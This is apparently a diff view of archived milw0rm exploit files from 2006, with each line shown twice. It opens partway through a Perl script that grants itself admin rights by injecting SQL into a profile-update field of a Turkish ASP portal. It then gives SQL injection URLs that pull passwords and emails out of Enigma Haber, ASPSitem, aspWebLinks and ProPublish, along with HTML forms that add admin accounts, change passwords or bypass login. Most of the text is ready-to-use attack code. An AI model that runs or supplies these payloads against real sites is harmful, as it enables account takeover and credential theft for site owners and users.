print $mnl "Connection: Keep-Alive\r\n"; print $mnl "Connection: Keep-Alive\r\n";
print $mnl "Cache-Control: no-cache\r\n\r\n"; print $mnl "Cache-Control: no-cache\r\n\r\n";
print $mnl $mnldata; print $mnl $mnldata;
print $mnl "\r\n\r\n"; print $mnl "\r\n\r\n";
while ($answer = <$mnl>) { while ($answer = <$mnl>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; } if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); } if ($answer =~ /Cache-control:/) { doadmin(); }
} }
#if you are here... #if you are here...
die "- Exploit failed\r\n"; die "- Exploit failed\r\n";
} }
sub doadmin () sub doadmin ()
{ {
close($mnl); close($mnl);
print "- Editing profile..\r\n"; print "- Editing profile..\r\n";
$mnptar = "Your_Account.asp?op=UpdateProfile"; $mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar; $mnpreq = $mnhost.$mndir.$mnptar;
$mnpdata.= "email=".$mnmail; $mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r"; $mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo"; $mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs"; $mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1"; $mnpdata.= "&icq=1";
$mnpdata.= "&msn=1"; $mnpdata.= "&msn=1";
$mnpdata.= "&aim=1"; $mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1"; $mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1"; $mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b"; $mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1"; $mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1"; $mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1"; $mnpdata.= "&yas_3=1920',seviye='1";
$mnpdata.= "&web=http://www.milw0rm.com"; $mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r"; $mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif"; $mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on"; $mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata); $mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n"; $mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnp "POST $mnpreq HTTP/1.1\r\n"; print $mnp "POST $mnpreq HTTP/1.1\r\n";
print $mnp "Accept: */*\r\n"; print $mnp "Accept: */*\r\n";
print $mnp "Referer: $mnhost\r\n"; print $mnp "Referer: $mnhost\r\n";
print $mnp "Accept-Language: tr\r\n"; print $mnp "Accept-Language: tr\r\n";
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n"; print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnp "Accept-Encoding: gzip, deflate\r\n"; print $mnp "Accept-Encoding: gzip, deflate\r\n";
print $mnp "User-Agent: NukeZilla\r\n"; print $mnp "User-Agent: NukeZilla\r\n";
print $mnp "Cookie: $mnlcookie\r\n"; print $mnp "Cookie: $mnlcookie\r\n";
print $mnp "Host: $mnserver\r\n"; print $mnp "Host: $mnserver\r\n";
print $mnp "Content-length: $mnpdatalen\r\n"; print $mnp "Content-length: $mnpdatalen\r\n";
print $mnp "Connection: Keep-Alive\r\n"; print $mnp "Connection: Keep-Alive\r\n";
print $mnp "Cache-Control: no-cache\r\n\r\n"; print $mnp "Cache-Control: no-cache\r\n\r\n";
print $mnp $mnpdata; print $mnp $mnpdata;
print $mn "\r\n\r\n"; print $mn "\r\n\r\n";
while ($answer = <$mnp>) { while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) { if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...\r\n"; print "- Editing profile been done...\r\n";
print "- Exploiting finished succesfully\r\n"; print "- Exploiting finished succesfully\r\n";
print "- Your username $mnuser has been created as admin\r\n"; print "- Your username $mnuser has been created as admin\r\n";
print "- You can login with password $mnpass on $mnlreq\r\n"; print "- You can login with password $mnpass on $mnlreq\r\n";
exit(); exit();
} }
if ($answer =~ /Üyeler Açýktýr/) { if ($answer =~ /Üyeler Açýktýr/) {
print "- Exploit failed\r\n"; print "- Exploit failed\r\n";
exit(); exit();
} }
} }
#if you are here... #if you are here...
die "- Exploit failed\r\n"; die "- Exploit failed\r\n";
} }
# nukedx.com [2006-05-27] # nukedx.com [2006-05-27]
# milw0rm.com [2006-05-27] # milw0rm.com [2006-05-27]

50
platforms/asp/webapps/1840.txt
View file

@ -1,25 +1,25 @@
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Enigma Haber <= 4.3 This exploits works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34 Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586 http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1 http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00 http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00 http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights. Examples in the below needs admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664 http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
# nukedx.com [2006-05-27] # nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28] # milw0rm.com [2006-05-28]

30
platforms/asp/webapps/1845.txt
View file

@ -1,15 +1,15 @@
ASPSitem <= 2.0 Multiple Vulnerabilities. ASPSitem <= 2.0 Multiple Vulnerabilities.
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on ASPSitem <= 2.0. This exploits works on ASPSitem <= 2.0.
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39 Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
SQL injection -> SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL] GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20 EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201 id%20like%201
with this example remote attacker can leak userid 1's login information from database. with this example remote attacker can leak userid 1's login information from database.
Read others private messages -> Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
# nukedx.com [2006-05-27] # nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28] # milw0rm.com [2006-05-28]

138
platforms/asp/webapps/1849.htm
View file

@ -1,69 +1,69 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<div bgcolor="#000000"> <div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);"> <form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change // <b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
Name Name
: </b></font> : </b></font>
<input type="text" name="name" value="" size="20"> <input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname <font size="1" color="#C0C0C0" face="Arial"> Example: Surname
Name</font><br> Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User <font face="Verdana" size="2" color="#FF0000"><b>User
Mail Mail
: </b></font> : </b></font>
<input type="text" name="email" value="" size="20"> <input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: <font size="1" color="#C0C0C0" face="Arial"> Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br> <a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User <font face="Verdana" size="2" color="#FF0000"><b>User
Ýd Ýd
: </b></font> : </b></font>
<input type="text" name="id" value="" size="20"> <input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1 <font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
Admin</font><br> Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country : <font face="Verdana" size="2" color="#FF0000"><b>User Country :
</b> </b>
</font> </font>
<select size="1" name="country"> <select size="1" name="country">
<option value="0">Choose Country</option> <option value="0">Choose Country</option>
<option value="Turkey">Turkey</option> <option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example: </select> <font size="1" color="#C0C0C0" face="Arial"> Example:
Turkey</font><br> Turkey</font><br>
<b> <b>
<font face="Verdana" size="2" color="#FF0000">User </font> <font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font> <font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000"> <font face="Verdana" size="2" color="#FF0000">
: </font></b> : </font></b>
<input type="text" name="password" value="Password" size="20"> <input type="text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br> <font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b> <b>
<font face="Verdana" size="2" color="#FF0000">User </font> <font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000"> <font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
: </font></b> : </font></b>
<input type="text" name="passwordre" value="Re Password" size="20"> <input type="text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br> <font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>Form Action : <font face="Verdana" size="2" color="#FF0000"><b>Form Action :
</b> </b>
</font> </font>
<input type="text" name="adres" value="profileupdate.asp" size="20"> <input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: <font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileu<WBR>pdate.asp</font></p> http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
<p> <p>
<input type="submit" name="Submit" value="Change"> </p> <input type="submit" name="Submit" value="Change"> </p>
<br> <br>
</form> </form>
</div></body></html> </div></body></html>
# milw0rm.com [2006-05-29] # milw0rm.com [2006-05-29]

86
platforms/asp/webapps/1850.htm
View file

@ -1,43 +1,43 @@
################ KAPDA - Security Science Researchers Institute ################# ################ KAPDA - Security Science Researchers Institute #################
#Advisory : http://www.kapda.ir/advisory-337.html #Advisory : http://www.kapda.ir/advisory-337.html
#Vendor : http://www.nukedit.com/ #Vendor : http://www.nukedit.com/
#What is : Nukedit is a Free Content Management #What is : Nukedit is a Free Content Management
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable! #Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir #Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
#Vulnerabale versions : <= 4.9.6 #Vulnerabale versions : <= 4.9.6
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com #Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
#Solution : update to new version of nukedit . #Solution : update to new version of nukedit .
#Change "http://victim.com/nukedit/utilities/register.asp" #Change "http://victim.com/nukedit/utilities/register.asp"
################ KAPDA - Security Science Researchers Institute ################# ################ KAPDA - Security Science Researchers Institute #################
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title> <html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body> <body>
<font face="Verdana" Size="1"><br> <font face="Verdana" Size="1"><br>
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br> Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br> Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br> Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
Fill the blank and submit . After that login with your email ! + your password .<p> Fill the blank and submit . After that login with your email ! + your password .<p>
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp"> <form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
<input type="hidden" name="action" value="addDB"></p> <input type="hidden" name="action" value="addDB"></p>
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt"> <br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
<input type="hidden" name="company" size="30" value="MSN"> <input type="hidden" name="company" size="30" value="MSN">
<input type="hidden" name="Url" size="30" value="http://www.lol.ir"> <input type="hidden" name="Url" size="30" value="http://www.lol.ir">
<input type="hidden" name="address" size="30" value="System32"> <input type="hidden" name="address" size="30" value="System32">
<input type="hidden" name="county" size="30" value="00"> <input type="hidden" name="county" size="30" value="00">
<input type="hidden" name="zip" size="10" value="12345"> <input type="hidden" name="zip" size="10" value="12345">
<input type="hidden" name="country" value="XPL"> <input type="hidden" name="country" value="XPL">
<input type="hidden" name="phone" size="15" value="12345678"> <input type="hidden" name="phone" size="15" value="12345678">
<input type="hidden" name="fax" size="15" value="87654321"> <input type="hidden" name="fax" size="15" value="87654321">
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt"> <br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt"> <br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
<input type= "hidden" name="groupid" value="1"> <input type= "hidden" name="groupid" value="1">
<input type="hidden" name="IP" value="10.9.8.7"> <input type="hidden" name="IP" value="10.9.8.7">
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br> <br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) --> <!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
</font> </font>
</form> </form>
</body> </body>
</html> </html>
# milw0rm.com [2006-05-29] # milw0rm.com [2006-05-29]

158
platforms/asp/webapps/1859.htm
View file

@ -1,79 +1,79 @@
<!-- <!--
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection # Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
# Author : ajann # Author : ajann
# Dork : aspWebLinks 2.0 # Dork : aspWebLinks 2.0
SQL INJECTION: SQL INJECTION:
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
--> -->
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title> <title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
<form method='POST' action='links.asp?action=modifyconfigprocess'><input <form method='POST' action='links.asp?action=modifyconfigprocess'><input
type='hidden' name='txtConfigID' value='1'><input type='hidden' type='hidden' name='txtConfigID' value='1'><input type='hidden'
name='txtSkinName' value='default'><table border='0' width='100%' name='txtSkinName' value='default'><table border='0' width='100%'
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right' cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
Password:</b></font></td><td width='70%'><input type='text' Password:</b></font></td><td width='70%'><input type='text'
name='txtAdministrativePassword' size='43' name='txtAdministrativePassword' size='43'
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right' value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
New:</b></font></td><td width='70%'><input type='text' New:</b></font></td><td width='70%'><input type='text'
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%' name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1" width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
width='30%' align='right' valign='top'><font face="Tahoma" size="1" width='30%' align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Category Header:</b></font></td><td width='70%'><input color="black"><b>Category Header:</b></font></td><td width='70%'><input
type='text' name='txtCategoryHeader' size='43' value='<b>Select A type='text' name='txtCategoryHeader' size='43' value='<b>Select A
Category:</b>'></td></tr><tr><td width='30%' align='right' Category:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Category valign='top'><font face="Tahoma" size="1" color="black"><b>Category
Columns:</b></font></td><td width='70%'><input type='text' Columns:</b></font></td><td width='70%'><input type='text'
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%' name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
Category Header:</b></font></td><td width='70%'><input type='text' Category Header:</b></font></td><td width='70%'><input type='text'
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
or ADD your link:'></td></tr><tr><td width='30%' align='right' or ADD your link:'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
Description:</b></font></td><td width='70%'><input type='radio' value='YES' Description:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowCatDescription' checked >YES<input type='radio' value='NO' name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right' name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
home page:</b></font></td><td width='70%'><input type='radio' value='YES' home page:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO' name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right' name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
items on home page:</b></font></td><td width='70%'><input type='text' items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%' name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Show Whats Hot on home page:</b></font></td><td color="black"><b>Show Whats Hot on home page:</b></font></td><td
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
>YES<input type='radio' value='NO' name='txtShowWhatsHot' >YES<input type='radio' value='NO' name='txtShowWhatsHot'
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font >NO</td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Require approval for link and review face="Tahoma" size="1" color="black"><b>Require approval for link and review
additions:</b></font></td><td width='70%'><input type='radio' value='YES' additions:</b></font></td><td width='70%'><input type='radio' value='YES'
name='txtNeedApproval' checked >YES<input type='radio' value='NO' name='txtNeedApproval' checked >YES<input type='radio' value='NO'
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right' name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
items on home page:</b></font></td><td width='70%'><input type='text' items on home page:</b></font></td><td width='70%'><input type='text'
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%' name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
align='right' valign='top'><font face="Tahoma" size="1" align='right' valign='top'><font face="Tahoma" size="1"
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
width='70%'><input type='text' name='txtWhatsHotHeader' size='43' width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right' value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
Added</option><option value='HITS'>Number of Added</option><option value='HITS'>Number of
Visits</option></td></tr><tr><td width='30%' align='right' Visits</option></td></tr><tr><td width='30%' align='right'
valign='top'><font face="Tahoma" size="1" valign='top'><font face="Tahoma" size="1"
color="black"><b></b></font></td><td width='70%'><input type='submit' color="black"><b></b></font></td><td width='70%'><input type='submit'
value='Update Configuration' name='B1'></td></tr></table></form> value='Update Configuration' name='B1'></td></tr></table></form>
# milw0rm.com [2006-06-01] # milw0rm.com [2006-06-01]

16
platforms/asp/webapps/1873.txt
View file

@ -1,8 +1,8 @@
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability # ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded # Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir # Exploited by FarhadKey from kapda.ir
Exploit : Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
# milw0rm.com [2006-06-03] # milw0rm.com [2006-06-03]

24
platforms/asp/webapps/1884.htm
View file

@ -1,12 +1,12 @@
<!-- orginal advisory : http://www.kapda.ir/advisory-340.html --> <!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit <html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp"> </center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='"> <input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
<input type="hidden" name="Password" value="1"> <input type="hidden" name="Password" value="1">
<center><br><input type="submit" name="Submit" value="Login"></center><br><br> <center><br><input type="submit" name="Submit" value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net --> <!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center> <center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
</form> </form>
</html> </html>
# milw0rm.com [2006-06-06] # milw0rm.com [2006-06-06]

4
platforms/asp/webapps/1900.txt
View file

@ -12,5 +12,5 @@
